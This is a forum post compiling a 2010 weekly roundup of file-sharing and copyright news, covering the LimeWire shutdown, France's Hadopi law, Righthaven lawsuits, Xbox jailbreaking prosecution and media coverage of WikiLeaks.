27-10-10, 06:41 AM   #1
JackSpratts
Join Date: May 2001
Location: New England
Posts: 10,009
Peer-To-Peer News - The Week In Review - October 30th, '10

Since 2002

"As soon as anyone on the network visits an insecure website known to Firesheep, their name and photo will be displayed. Double-click on someone, and you're instantly logged in as them." – Eric Butler

"I don't think you can ever take away from a movie theater. I am an avid movie lover - getting pirated works was my cheap fix - going to the theaters, well shit. That's the good stuff right there." – anononline

"Most of the bootleg copies are out there, because I lent it to people." – Stephen Sondheim

Scener Spills Beans on Social Site

An anonymous poster claiming to be a long time member of an infamous scene bootleg crew, those shadowy groups known for releasing high quality copies of current Hollywood films, came out of the cold to talk at the news and comment site reddit.com.

Now retired, the self-described pirate known only as “anononline” answered members’ questions, posted anecdotes and told stories about his time in the secretive world of the scene.

If his outlaw years once guaranteed him high octane excitement, he clearly looks back on them now with ambivalence, allowing that he spent “staggering. unbelievably staggering” amounts of time consumed with being first to release, and acknowledging that the life took a personal toll on others as well, leading to prison, drug addiction and suicide.

Nevertheless he says he’s doing fine today, and he’s proud of the fact that some of his former peers are too, one having quit drugs, one finding work in film and another having gone into politics.



October 30th, 2010

Judge Tells LimeWire, the File-Trading Service, to Disable Its Software
Tim Arango

A federal judge in New York issued an injunction on Tuesday that will essentially shut down LimeWire, the big music file-sharing service that has been mired in a four-year legal struggle with the music industry. The case has already resulted in the company and its founder being found liable for potentially hundreds of millions of dollars in damages.

Although LimeWire, a file-sharing service that allows users to swap music and a major descendant of Napster, is on the verge of vanishing in its current form, the company will continue negotiations with the major music companies about a licensing deal to offer music legally for sale with a subscription service.

“While this is not our ideal path, we hope to work with the music industry in moving forward,” the company said in a statement. “We look forward to embracing necessary changes and collaborating with the entire music industry in the future.”

In her ruling, Judge Kimba M. Wood of Federal District Court in Manhattan forced the company to disable “searching, downloading, uploading, file trading and/or file distribution functionality” of the company’s file-sharing software.

On Tuesday afternoon, visitors to LimeWire’s Web site were greeted with a legal notice and the words, “downloading or sharing copyrighted content without authorization is illegal.” Much of the site was shut down, but there was a link to a copy of the injunction.

LimeWire, founded in 2000 by Mark Gorton, a successful Wall Street trader, now appears to be headed the way of the former Internet pirates Napster and Grokster, both of which lost legal battles against the music industry.

In a statement Tuesday, the Recording Industry Association of America, the music industry’s trade group that had managed the suit, said: “For the better part of the last decade, LimeWire and Gorton have violated the law. The court has now signed an injunction that will start to unwind the massive piracy machine that LimeWire and Gorton used to enrich themselves immensely.”

The legal fight does not end here. In May, Judge Wood ruled that the company had violated copyright law and was liable for damages. The court is scheduled to decide early next year the amount the company and Mr. Gorton will be forced to pay.

“In January, the court will conduct a trial to determine the appropriate level of damages necessary to compensate the record companies for the billions and billions of illegal downloads that occurred through the LimeWire system,” the recording association said in its statement.

P2P File-Sharing Software FrostWire Launches on Android Market
Gary Cutlack

The multi-protocol file-sharing tool FrostWire has just launched its Android app on the Android Market, promising to bring the world of potentially dubious P2P content to your poor little SD card via the Android Market.

It’s been available on Android for some time via direct download, now it’s up on the Market for the mainstream users. Here’s the list of Android features, courtesy of FrostWire itself:

- Search & download files on millions of devices
- Browse & download files from your closest peers
- Share files on Social Networks
- Explore, rename and use your own files
- P2P Chat room
- Send private messages w/attachments
- Control what you share
- Auto-updates

Plus the Android app won’t work via 3G due to obvious reasons to do with being a massive bandwidth and data eater. Here’s a nice little montage of images of the app in action, issued by FrostWire:

If you would like to try it for free, there’s a direct download of the Android APK hosted on FrostWire’s site here – whereas the Android Market version comes with a $4.99 price tag attached to it.

Dead Drops
Aram Bartholl

I am pleased to preview ‘Dead Drops’, a new project which I started off as part of my ongoing EYEBEAM residency in NYC the last couple weeks. ‘Dead Drops’ is an anonymous, offline, peer to peer file-sharing network in public space. I am ‘injecting’ USB flash drives into walls, buildings and curbs accessible to anybody in public space. You are invited to go to these places (so far 5 in NYC) to drop or find files on a dead drop. Plug your laptop to a wall, house or pole to share your files and data. Each dead drop contains a readme.txt file explaining the project. ‘Dead Drops’ is still in progress, to be continued here and in more cities. Full documentation, movie, map and ‘How to make your own dead drop’ manual coming soon! Stay tuned.

Jailbreaking Your iPhone? Legal! Jailbreaking Your Xbox? 3 Years In Jail!
Mike Masnick

Bunnie Huang is no stranger to absolutely ridiculous legal claims concerning trying to hack an Xbox. After doing so, he had trouble publishing a book on the subject, over fears that telling people how to modify a piece of electronics they had legally purchased might somehow violate copyright law (anyone else see a problem with that?). Now, techflaws.org points us to the news that Huang is scheduled to testify on behalf of a guy facing jailtime for modifying Xboxes. But US officials are trying to bar his testimony, claiming it's "not legally relevant." Technically, they're probably right. But, from a common sense standpoint, Huang is trying to make a bunch of important points.

First, let's take a step back, and realize just how ridiculous this situation is. If you buy a piece of electronic equipment, should you ever deserve jailtime for then modifying it? With most things you buy, you have every right to then make changes to it. Yet, when it comes to gaming consoles, suddenly that can get you jailtime. The culprit? Of course, it's the ever-present DMCA, and its anti-circumvention clause, which lets any device maker put in some "technological protection measures," and suddenly it's illegal to modify what you thought you legally owned.

Now, supporters of the DMCA will note that every few years we have the lovely "exceptions" process, whereby the Librarian of Congress gets to (somewhat arbitrarily) choose what things won't get covered by the anti-circumvention clause. Just a few months ago, for example, it was deemed "ok" to jailbreak your mobile phone. So, here's the conundrum: it's perfectly legal to jailbreak your iPhone, but you can get thrown in jail for jailbreaking your Xbox. Explain that.

Huang wants to testify on behalf of Matthew Crippen, who would jailbreak Xboxes. Huang planned to show the jury just how easy it was to mod an Xbox. While he doesn't say so, my assumption is that the idea is to show that, and then suggest that the anti-circumvention provision does not apply because it shows that the Xbox's technological protection measures are not "effective," and the anti-circumvention provisions are only designed to apply to "a technological measure that effectively controls access to a work protected under this title." Similar arguments have actually worked in Europe, though I'm not sure if they'll work here.

Either way, I'm guessing the court won't allow Huang to testify for a variety of legal reasons, but even if he doesn't, it would be nice if the court and anyone else could explain why jailbreaking an iPhone is fine while jailbreaking an Xbox gets you jailtime.

Jammie Thomas Set for Third Trial
Eamonn Forde

Jammie Thomas will face a third trial in the US as she contests the fines imposed on her for alleged filesharing activity.

She was accused of downloading and sharing 24 tracks on Kazaa in 2005. Her first trial began in 2007 and she was found to be guilty of willful copyright infringement and ordered to pay statutory damages of $222k (£140k).

A retrial happened in 2009 and she was ordered to pay $1.92m (£1.21m) in damages to the RIAA. A judge reduced the fine to $54k (£34k) and the RIAA then offered a settlement of $25k (£16k) but Thomas and her lawyers declined.

In June, Thomas' legal team requested the fine be reduced yet further, but the judge in the case refused, meaning that a third hearing is now scheduled to take place on November 2.

Universal Music Denied Rehearing Over Eminem Royalty Case

A federal court has denied Universal Music Group's request for a rehearing in the court case over digital sales royalties for Eminem. Last month, a California federal appeals court ruled in favor of Eminem and his producers in a court battle against UMG, with a decision over iTunes and digital music royalties that could have far-reaching effects in the music industry.

The Detroit Free Press reports that the U.S. 9th Circuit Court of Appeals denied UMG's petition for a rehearing and that the label's only remaining legal option would be an appeal to the Supreme Court. In the meantime, the case is expected to return to a lower court in Los Angeles.

In September, the California appeals court reversed a lower-court jury decision from 2009, ruling that Em and his production company were due almost three times as many royalties as they had received for digital sales of songs and ringtones. In the suit, Eminem's former production company, FBT Productions claimed that selling songs via iTunes was similar to licensing deals for music and TV and should award a 50 percent royalty rate, while UMG said a standard 18 percent royalty rate should be the norm, a la physical sales.

French Three Strikes Agency Getting 25,000 Complaints a Day
Matthew Lasar

Nobody knows how many file sharers are getting warnings from France's new P2P infringement authority, but Billboard.biz says that French labels are sending 25,000 complaints a day to Hadopi, the agency enforcing that country's "three strikes" law.

The figure comes from David El Sayegh, the head of France's music label trade association, who insists that he doesn't know how many warnings have gone out as a consequence of the stream of complaints. "It is too early," Sayegh told Billboard, but also says that he expects to have an assessment of the impact Hadopi is having on digital sales by early next year.

We're presuming that rights holders hope that legal digital sales will go up, and alleged infringements will go down. Maybe so, but a study released just after the law's passage last year suggested an uptick in areas the legislation doesn't cover, like one-click downloading sites such as Rapidshare.

France's tough online infringement law allows Hadopi to, following a complaint, track down the user in question, initiate a warning process, and ultimately boot the consumer off his or her ISP if the subscriber doesn't comply with instructions to behave.

"Insiders," Billboard reports, say HADOPI is moving cautiously in response to the complaints: "There were fears that their hotline would be overloaded by people calling after having received a warning, or by people protesting at the HADOPI system. Billboard.biz understands the hotline remained much quieter than initially feared."

French Torrent Site Launches VPN to Conceal Filesharers' Identities
Eamonn Forde

Torrent tracker Smartorrent has launched a VPN (virtual private network) in France to offer filesharers anonymity.

As the country rolls out its 'three strikes' anti-piracy legislation, Smartorrent has offered to cloak users' identities so they can continue filesharing.

TorrentFreak reports that 2,500 of the site's 1.7m registered users have signed up to the SmartVPN service, which costs €5 (£4.37) a month.

Smartorrent co-founder Clever told TorrentFreak, “Since the adoption of this new Hadopi law we thought about starting a VPN service. We wanted to give our beloved users the ability to keep downloading safely by using our VPN servers that are located in Canada.”

Hadopi is currently sending out 25,000 warning letters a day in France.

A Look At How Many People Have Been Kicked Offline In Korea On Accusations (Not Convictions) Of Infringement
Mike Masnick

With the Hadopi three strikes program in France kicking into full speed, it may be worth jumping halfway around the world to South Korea, which put in place a very strict copyright law last year, that included the ability to kick people offline for accusations (not convictions) of file sharing. It's worth noting, of course, that the reason South Korea put in place such a draconian copyright law was due to serious diplomatic pressure from the US as a part of a supposed "free trade" agreement between the two countries. It's also worth pointing out that the trade agreement between South Korea and the US was, according to many, the basis for the initial draft of ACTA (though, obviously, it's changed a lot since then).

So, now that the law has been in place for over a year, what's been happening in South Korea? Well, it turns out that people are getting kicked offline for accusations of file sharing -- but worryingly, it appears they're being kicked off with one strike, not three. Glyn Moody points us to a report on the data behind what's going on in South Korea.

Now, it's important to understand the specifics of the law there. There are two ways a user can have his or her account suspended. The first is if the Minister of Culture orders the ISP to suspend the user. However, this can only come after the user has been warned three times (hence: three strikes). However, there's also a separate way, which is that the Copyright Commission can "recommend" that ISPs warn someone, block or delete materials believed to be infringing or suspend accounts. Deleting or suspending doesn't require any prior notice or warnings or anything. Basically, the Commission says "we recommend you censor this content and/or suspend this user" and the ISPs then have a choice to make. Guess what they do? That's right, they obey. Nearly every time. Out of over 65,000 "recommendations" by the Commission, ISPs have only declined to follow the recommendation 40 times -- 20 times in sending out warnings and 20 times in deleting content. It's never declined to follow a recommendation to suspend an account.

Below is the full chart of data concerning the Copyright Committee's recommendations, and what was done about them:

Hopefully, it's clear what's going on. Basically, the Commission has sent out a lot of warnings, and blocked/deleted a ton of content. A total of 31 users have had their accounts suspended -- again, with no indication that there was any number of warnings or pre-notice at all. Separately, the blog post in question does note that the other method (the actual three strikes way, involving the Culture Minister) has sent out a much smaller 275 warnings and 41 orders to delete content, but none to suspend accounts.

Has Illegal Filesharing Just Become "a Little Cheaper" in Germany?
Birgit Clark

An interesting decision on damages in cases of copyright infringing file-sharing has been handed down by the Regional Court Hamburg (LG Hamburg, decision of 8 October 2010, case reference 308 O 710/09).

In a press release the Hamburg court states that it decided that a 16 year old file-sharer was only liable to pay damages of 15 Euros for each title he had illegally shared online. In this case the overall damages amounted to 30 Euros for two songs he had offered illegally on an Internet file sharing site. The claimant, who owned the distribution rights for these songs, had asked for damages of 300 Euros per title, which appears to be a fairly common amount usually awarded for such damages.

When deciding the amount of damages to be awarded - which had to be based on what a respective licence for these songs would have cost ("fiktiver Lizenzvertrag") - the court took into consideration that the titles in question were songs of well-known artists (at least well known in Germany: the song "Engel" by Rammstein and the song "Dreh' dich nicht um" by German singer-songwriter Westernhagen). However, the court also took into consideration that the songs were already several years old when they were offered online. As such, the court assumed that there was little demand for the songs. Furthermore, the court held that it was important that the songs had only been offered for a short time and the court hence assumed that each song had only been downloaded about one hundred times.

The Hamburg court further held that the father of the 16 year old was not liable for copyright infringement. He had allowed his son to use the Internet access, was to be regarded as a "disturber" ("Störer") and had a duty of care ("Überwachungspflicht") concerning the Internet access that was used to commit the copyright infringing acts under the German principle of disturber liability. However, the father had not himself committed copyright infringement and as such was not liable for damages.

This Kat will certainly not go as far as to say that copyright infringement in Germany has just become a little bit cheaper, since every case very much will turn on its specific facts, but this decision by the Hamburg court nonetheless gives a good indication that the German courts appear to adopt a rather pragmatic real life approach when assessing the level of damages to be awarded.

The court's press release can be accessed here.

Facebook Buys into File-Sharing

Social networking giant snaps up New York based start-up drop.io
Phil Muncaster

Facebook has acquired most of the assets of file-sharing service provider drop.io in a deal which will see the company wind down by December and its founder move to the social networking giant.

Drop.io is an online collaboration and file-sharing service which uses the concept of user-controlled personal sharing points known as ‘drops’ through which users can upload and share content privately via a drag-and-drop interface.

Facebook will gain most of the New York based start-up’s technology and assets, drop.io revealed in a blog post.

Its founder, Sam Lessin, will be moving to Facebook full time where presumably he will work on developing similar services to be integrated into the social network.

“In the coming weeks, we’ll be winding down the drop.io service. As of this week, people will no longer be able to create new free drops, but you’ll be able to download content from existing drops until 15 December,” noted the posting.

“Paid user accounts will still be available through 15 December and paid users will be able to continue using the service normally. After 15 December, paid accounts will be discontinued as well.”

The firm said that other drop.io services like Presslift, its Yahoo Mail application, and APIs will stay online for a longer period before the company winds down.

“We’ll announce more details on that soon. However, starting immediately, we’ll no longer be selling new premium accounts for those services,” it explained.

BBC Admits Mark Thomas Filesharing Show Contained Inaccuracies

Trust committee partly upholds Feargal Sharkey complaint but rejects claim that programme was 'biased and prejudicial'

Mark Thomas presents The Culture Show's special on music piracy

The BBC has admitted that parts of a controversial Culture Show report by comedian and political activist Mark Thomas on filesharing were inaccurate, but denied a complaint by UK Music chief executive Feargal Sharkey that it was "biased and prejudicial".

Thomas's Culture Show report, which aired on the BBC2 show in February this year, examined the Digital Economy Bill which was then going through parliament and its attempt to crack down on illegal downloading.

The comedian, who opposed that part of the bill – which has since become law – said on the show that it enabled film and music industry bodies to cut off people's internet access on the "bare minimum of evidence".

Sharkey, who spoke in favour of the bill on The Culture Show, said in his complaint to the BBC that Thomas's report was "not only grossly misleading and inaccurate, but also misinformed the audience in a bias [sic] and prejudicial manner, thereby contravening the BBC's editorial guidelines relating to accuracy and impartiality". His complaint was part upheld with regard to accuracy and not upheld with regard to impartiality.

Sharkey, who had demanded an on-air retraction and apology, took his complaint to the BBC's highest arbiter, the BBC Trust's editorial standards committee, after his initial concerns were largely rejected by the corporation's management.

The trust committee, in its ruling today, said Thomas's report was an "authored" piece and was "not to be taken as if it were a report by a BBC presenter or reporter".

But it admitted it "might have been better for the introduction to have more clearly indicated that the report was authored".

The ESC said the "section of the report on the likely effects of the new bill had given the audience an inaccurate description of how the process of disconnection would work", adding that in "attempting to paraphrase the legal complexities of the bill the report had not been sufficiently precise and had been inaccurate".

"Use of the word 'criminalise' in the introduction to the report was inaccurate but that this aspect of the complaint had been satisfactorily dealt with by the programme at the earliest opportunity," the committee added.

The report had also "not retained a respect for factual accuracy ... with regard to the implication given that the secretary of state had unfettered discretion to amend the law on copyright without parliamentary scrutiny".

Critics of Thomas's report claimed he had given much more time to opponents of the bill – 8 minutes and 20 seconds out of a total of 10 minutes, according to Sharkey – than its supporters.

But the BBC Trust committee ruled that the programme had not breached BBC guidelines on impartiality.

"While Mark Thomas had expressed strong personal opinions in his links to camera, this was permitted by the guidelines on authored programmes. All the main views, including those that contradicted Mark Thomas's, were reflected," the committee said.

"Bias on a controversial subject had been avoided and ... impartiality had been achieved in a way that was adequate and appropriate to the output," the ESC added.

Local News Website Says You Need To Pay To Read Its Stories, Says It's Collecting Visitor IPs To Sue
Mike Masnick

Well, here's a fun one. Apparently, there's a local news site known as The North Country Gazette (don't click that just yet...) covering parts of upstate New York via a blog format. Rather than putting in place an actual technical paywall, the site has apparently decided to go with a paywall-by-threat model. If you visit a story on the site, it tells you that you're only allowed to view one page for free, and then they expect you to pay up:

Gotta love that Comic Sans font -- in red, no less. Anyway, if you do "abuse the privilege," apparently you come up against the following (which now appears to have been taken down, perhaps due to all of the attention):

In case you can't see/read the image, it reads:

A subscription is required at North Country Gazette. We allow only one free read per visitor. We are currently gathering IPs and computer info on persistent intruders who refuse to buy subscription and are engaging in a theft of services. We have engaged an attorney who will be doing a bulk subpoena demand on each ISP involved, particularly Verizon Droids, Frontier and Road Runner, and will then pursue individual legal actions.

Where to start? First, I love how "Verizon Droid" (a phone) is included in the list of ISPs. But, more to the point, this site seems to believe that if it just says you can only visit once without paying, and you don't, it has the right to then use your IP to sue you for "theft of services." I'd love to see how well that plays out in court.

The $105 Fix That Could Protect You From Copyright-Troll Lawsuits
David Kravets

Call it ingenious, call it evil or call it a little of both: Copyright troll Righthaven is exploiting a loophole in intellectual property law, suing websites that might have avoided any trace of civil liability had they spent a mere $105.

That’s the fee for a blog or other website to register a DMCA takedown agent with the U.S. Copyright Office, an obscure bureaucratic prerequisite to enjoying a legal “safe harbor” from copyright lawsuits over third-party posts, such as reader comments.

There’s no better time to become acquainted with that requirement.

Founded in March, the Las Vegas-based Righthaven has begun buying out the copyrights to newspaper content of the Las Vegas Review-Journal for the sole purpose of suing blogs and websites that re-post, or even excerpt, those articles without permission. The company has settled about 60 of 160 cases for a few thousand dollars each, and plans to expand its operations to other newspapers across the country.

Many of its lawsuits arise, not from articles posted by a website’s proprietors, but from comments and forum posts by the site’s readers. Under the Digital Millennium Copyright Act, a website enjoys effective immunity from civil copyright liability for user content, provided they promptly remove infringing material at the request of a rightsholder. That’s how sites like YouTube are able to exist, and why Wired.com allows users to post comments to our stories without fear that a single user’s cut-and-paste will cost us $150,000 in court.

But to dock in that legal safe harbor, a site has to, among other things, register an official contact point for DMCA takedown notices, a process that involves filling out a form and mailing a check to the government. An examination of Righthaven’s lawsuits targeting user content suggests it’s specifically going after sites that failed to fill out that paperwork.

“The DMCA is a good deterrent from being sued,” says Kurt Opsahl, a staff attorney with the Electronic Frontier Foundation, “Complying with conditions of eligibility for the safe harbor is a good thing to do. It probably will prevent somebody from suing you in the first place.”

The EFF is defending political community site Democratic Underground from a Righthaven suit stemming from a user’s posting of four paragraphs from a 34-paragraph Review-Journal story on Sharron Angle, the Republican Nevada candidate for Senate, entitled “Tea party fuels Angle.” The brevity of the excerpt, and the fact that the post links back to the original story, gives Democratic Underground a strong fair use defense. But had it registered with the Copyright Office, it wouldn’t even have to make that argument.

Opsahl doesn’t believe any of the sites Righthaven has sued had a designated agent, though not all of the cases involve user posts. (Righthaven did not respond to inquiries for this story.)

If you run a U.S. blog or a community site that accepts user content, you can register a DMCA agent by downloading this form (.pdf) and sending $105 and the form to Copyright RRP, Box 71537, Washington, D.C., 20024.

Opsahl and other experts note that failing to qualify for the DMCA safe harbor still leaves you with fact-based defenses from a lawsuit, including the defense, supported by some case law, that infringing third-party posts aren’t your responsibility.

Ben Sheffner, a Hollywood copyright attorney and the man behind the must-read blog Copyrights & Campaigns, says there is a reason the DMCA demands a takedown agent, which is supported by a recent court ruling.

“The idea is you need to make it easy for copyright owners to locate who you send infringement notices to,” he says. “They shouldn’t have to go hunting around.”

The Social Network Leaked on File-Sharing Sites Ahead of its Australian Release
Andrew Ramadge

It's a film about one of the greatest technological changes of our generation.

But David Fincher's new movie about the creation of Facebook may find itself falling prey to another 21st-century change.

Copies of The Social Network, which opened in the US on October 1, have been posted to file-sharing sites ahead of its Australian cinema release.

Blogger "Enigmax" of file-sharing news site TorrentFreak told news.com.au that low-quality "cam" versions of the film had started to appear online.

"Cam" copies of movies are those illicitly filmed in the cinema using handheld cameras.

Enigmax said it wasn't unusual for such copies to appear several weeks after a film's release.

"The time taken for 'cam's to hit the net has extended quite a lot in recent times, from less than a day to a couple of weeks," he said.

"It's probably not that unusual (for The Social Network to appear now), but towards the top end of the scale."

The low-quality copies had been moderately popular with file-sharers, racking up about 100,000 downloads, he said.

"That said, 'good' copies of movies come out a lot sooner than they used to, so many downloaders will be skipping the 'cam' and waiting for (a better version) to come along."

Sony Pictures Australia managing director Steven Basil-Jones said piracy was a risk the company sometimes had to take when deciding when to release overseas films.

"October 1 for us was right during school vacation, which is obviously different than in the US, so we're in a different scenario with cinema availabilities," he said.

"It's really a very fundamental sales issues we're faced with."

Mr Basil-Jones said other factors that played a part in delays to film releases included the availability of film stars to do promotional tours.

"The flipside of the coin is that the longer you wait, the more open you are to piracy and the film being seen either through file-sharing or people going to Asia and picking it up at markets on DVD," he said.

"It's just that horrible equation we have to do and the risk that we have to take in delaying anything these days."

BigChampagne's Building a Social Music Chart

Entrepreneur Eric Garland thinks he has a better music chart. His secret? Tweets, status updates, and web chatter.
Steve Knopper

Before the rise of online radio station Pandora and music video sites such as Vevo -- and years before Apple (AAPL) launched its iTunes music store -- Eric Garland reckoned that the Internet was going to transform the music industry. Back in 2000, when a lot of online listening activity involved illegal peer-to-peer file sharing via services such as Napster, Garland believed that all the online activity could actually help lesser-known bands and artists market themselves, if they could just quantify their successes. So he and Tom Allison, a former Coca-Cola (COKE) marketing executive, formed BigChampagne to catalogue file sharing and MP3 downloads.

Since then, digital downloading has gone legit: The iTunes Store, which opened in 2003, has sold more than 10 billion songs. Pandora has turned a profit. Even Napster has been rebranded as a legal subscription service. And BigChampagne, based in Beverly Hills, is more relevant than ever. Today it tracks sales, downloads, and listening activity on just about every music-distribution platform, from iTunes to FM radio to MySpace. (And, yes, it still tracks illegal file sharing too.)

BigChampagne then analyzes and sells the data to record labels, talent agents, and radio stations that are looking to find under-the-radar acts. Increasingly, clients also want to gauge the impact of social media such as Twitter, which recording artists have embraced wholeheartedly. (Just check out Kanye West's Twitter feed.) In late July, BigChampagne unveiled its latest creation, the Ultimate Chart, which supplements widely available data on sales on Amazon (AMZN) and iTunes with metrics that measure a song's buzz: YouTube (GOOG) and MySpace hits, Twitter and Facebook mentions, Clear Channel radio spins, and Rhapsody and Last.fm streams. "We are certainly trying to narrow the really significant gap between the charts that are published on a week-to-week basis and the actual artist-to-fan connection," Garland says.

Industry reaction to the new list has been mixed. Reps for Billboard and Nielsen Soundscan wouldn't comment, but one music industry executive says of the Ultimate Chart: "It's like the People's Choice Awards. It's hype for the sake of hype."

Ultimate Chart rankings don't always differ wildly from sales data. Bruno Mars' "Just the Way You Are" was No. 1 on BigChampagne's list during the week of Oct. 4, as it was on the Billboard Hot 100. But the "Glee" soundtrack version of the Alicia Keys/Jay-Z New York City anthem "Empire State of Mind" hit No. 7 on BigChampagne, vs. No. 21 on Billboard. That reflects under-measured online buzz following both the "Glee goes to New York" TV episode and a viral "Late Night With Jimmy Fallon" video in which Fallon and Justin Timberlake rap the history of hip-hop in less than four minutes. "The real measure of passion is sales," says Avery Lipman, co-president of Universal Republic Records, a unit of Vivendi's Universal Music Group. "That said, how can you ignore and discount 50 million [online] plays of Lady Gaga?"

BigChampagne uses a mix of software and human referees to compile its data. Its technology monitors web searches and catalogues music in consumers' shared folders. Meanwhile, a dozen or so "matchers" sit at a bank of computers and make real-time decisions about the data. Does a track that "features" Jay-Z count as a Jay-Z track, or should it be attributed to another artist? "We have taught computers over many years to be very consistent about reconciling all this different data," Garland says. "But we've also put editors in place to settle disputes."

Garland, 38, started his career as a management consultant, but he also happened to be a file sharer and music fan. ("I've always liked pop music for old people," he says.) He won't disclose sales -- BigChampagne is privately held -- but in a dozen years it has expanded from its Napster-era roots and now measures data from iTunes, Amazon, eMusic, AT&T (T), YouTube, MySpace, Last.fm, Facebook, and Twitter. Garland says he plans to expand the Ultimate Chart to track the popularity of albums. He also envisions expanding to other media, such as videogames, TV, even movies. Any product that can be consumed online then tweeted or recommended or friended is a candidate for BigChampagne to measure. Critics may dismiss the company's Ultimate lists as hype, but someday they may be as mainstream as, well, digital music.

Iceland Turns from Banks to Freedom of Speech

Iceland wants companies from around the world to set up their servers there and publish material online without the fear of ruinous lawsuits or censorship. Stephen Beard reports.

STEVE CHIOTAKIS: Iceland has a bold new international money-making plan. But after its last foray into the global marketplace, a financial system that went haywire, should the world be worried?

STEPHEN BEARD: Iceland does not intend getting into banking again. Just as well. Those banks wound up owing about ten times more than the whole Icelandic economy. No, the country now wants to turn itself into a haven for the digital age.

BIRGITTA JONSDOTTIR: A haven for freedom of information, freedom of expression and of speech.

JONSDOTTIR: What we're doing is putting together all the best laws so that one country can set the standard for how we in the future strengthen these rights.

Iceland wants people from around the world to set up their servers there and publish material online without the fear of ruinous lawsuits or censorship. Icelanders see this as a noble aim and a business opportunity.

SMARI McCARTHY: A lot of companies will just want internet hosting services.

Smari McCarthy is also involved in the project.

McCARTHY: Other organizations might have greater needs such as operating offices from here to protect their employees.

He says the plan could turn Iceland into a refuge for whistle blowers and anyone who wants to expose corporate or official abuses. But Alistair Mullis, Professor of Law at the University of East Anglia says it'll more likely turn Iceland into a hotbed of libel and intrusiveness.

ALISTAIR MULLIS: It will make it very difficult to sue people who are publishing defamatory material or material that's private when they are based in Iceland.

Another critic claims that Iceland will prove as reckless with reputations and with state secrets as it was with other people's money. But Smari McCarthy says Iceland merely wants to learn and profit from the disaster of its banking boom and bust.

McCARTHY: This is a country that was badly burned by a strong urge by those that are in power and those who own everything to keep the general public un-informed about what they are up to.

Iceland's information haven could be up and running in a year. This is Stephen Beard for Marketplace.

More on the Media's Pentagon-Subservient WikiLeaks Coverage
Glenn Greenwald

The New York Times' John Burns yesterday responded to (and complained about) criticisms -- voiced by me, Julian Assange and others -- over his gossipy, People Magazine-style "profile" of Assange, which his newspaper centrally featured as part of its coverage of the WikiLeaks document release. In a self-justifying interview with Yahoo! News' Michael Calderone, Burns makes several comments worth examining:

Burns said he doesn't "recall ever having been the subject of such absolutely, relentless vituperation" following a story in his 35 years at the Times. He said his email inbox has been full of denunciations from readers and a number of academics at top-tier schools such as Harvard, Yale, and MIT. Some, he said, used "language that I don't think they would use at their own dinner table."
This is really good to hear: quite encouraging. Apparently, many people become quite angry when the newspaper which did more to enable the attack on Iraq than any other media outlet in the world covered one of the most significant war leaks in American history -- documents detailing the deaths of more than 100,000 human beings in that war and the heinous abuse of thousands of others -- by assigning its most celebrated war correspondent and London Bureau Chief to studiously examine and malign the totally irrelevant personality quirks, alleged mental health, and various personal relationships of Julian Assange. Imagine that. Then we have this from Burns:

Such heated reactions to the profile, Burns said, shows "just how embittered the American discourse on these two wars has become."
Oh my, how upsetting. People are so very "embittered," and over what? Just a couple of decade-long wars that have spilled enormous amounts of innocent blood, devastated two countries for no good reason, and spawned a worldwide American regime of torture, lawless imprisonment, and brutal occupation. It's nothing to get upset over. People really need to lighten up. And stop being so mean to John Burns. That's what really matters.

After all -- as he himself told you just a couple of months ago -- there was just no way that he and his war-supporting media colleagues -- holding themselves out as preeminent, not-to-be-questioned experts on that country -- could possibly have known that an attack on Iraq would have led to such devastating violence and humanitarian catastrophe (except by listening to, rather than systematically ignoring, the huge numbers of people around the world loudly warning that exactly that could happen). The last thing he should have to endure are insulting emails from people who seem to think that such episodes warrant anger and recrimination. And that's to say nothing of the obvious irony of a reporter complaining about our "embittered discourse" after he just wrote one of the sleaziest, most vicious hit pieces seen in The New York Times in quite some time.

Then there's this:

The profile, Burns said, is "an absolutely standard journalistic endeavor that we would use with any story of similar importance in the United States" . . . . Burns added that the Times is "not in the business of hagiography" but in the "business of giving our readers the fullest context for these documents" and the Assange's motivations. "To suggest that doing that is some kind of grotesque journalistic sin, and makes me a sociopath," Burns said, "strikes me as pretty odd."
This is the heart of the matter. What Burns did to Julian Assange is most certainly not a "standard journalistic endeavor" for The New York Times. If anyone doubts that, please show me any article that paper has published which trashed the mental health, psyche and personality of a high-ranking American political or military official -- a Senator or a General or a President or a cabinet secretary or even a prominent lobbyist -- based on quotes from disgruntled associates of theirs. That is not done, and it never would be.

This kind of character smear ("he's not in his right mind," pronounced a 25-year-old who sort of knows him) is reserved for people who don't matter in the world of establishment journalists -- i.e., people without power or standing in Washington and, especially, those whom American Government authorities scorn. In official Washington, Assange is a contemptible loser -- the Pentagon hates him and wants him destroyed, and therefore the "reporters" who rely on, admire and identify with Pentagon officials immediately adopt that perspective -- and that's why he was the target of this type of attack. After I wrote my criticism of this article on Monday, I was contacted by Burns' co-writer, Ravi Somaiya, who defended this article from my criticisms. I agreed to keep the exchange off-the-record at his insistence -- and I will do so -- but that was the question I kept asking: point to any instance where the NYT ever subjected Someone Who Matters in Washington to this kind of personality and mental health trashing based on the gossip and condemnation of associates. It does not exist.

As for Burns' pronouncement that "the Times is 'not in the business of hagiography'," he should probably remind himself of what he himself wrote about the Right Honorable Gen. Stanley McChrystal, after Burns had attacked Michael Hastings for daring to publish the General's own statements that reflected badly on him. Here's what Burns wrote while falling all over himself in reverence of this Great American Warrior:

[A]ll that I know about General McChrystal suggests that he is, just as the Rolling Stone article suggested, a maverick of high self-belief and intensity, uncautioned in his disregard for the conventional, but for all that a soldier with a deep belief in the military's ideals of "duty, honor, country." Though handed what many would regard as a poisoned chalice in the Afghanistan command, he had worked relentlessly to rescue America’s fortunes there. . . . grave misfortune it is, considering what is lost to America in a commander as smart, resolute and as fit for purpose as General McChrystal . . . .

General George S. Patton Jr. . . . a man who was regarded at the time, like General McChrystal in Afghanistan, as the best, and the toughest, of America's war-fighting generals. . . . In Iraq, we barely glimpsed General McChrystal, then running the super-secret special operations missions that were crucial in turning the tide against Al Qaeda and the Sunni insurgency under General Petraeus’s command; but he, too, continued the pattern of access after he took command in Afghanistan in June 2009. . . .

Reporters, of course, do best when they keep their views to themselves, to retain their impartiality. But it's safe to say that many of the men and women who have covered General McChrystal as commander in Afghanistan, or in his previous role as the top United States special forces commander, admired him, and felt at least some unease about the elements in the Rolling Stone article that ended his career.
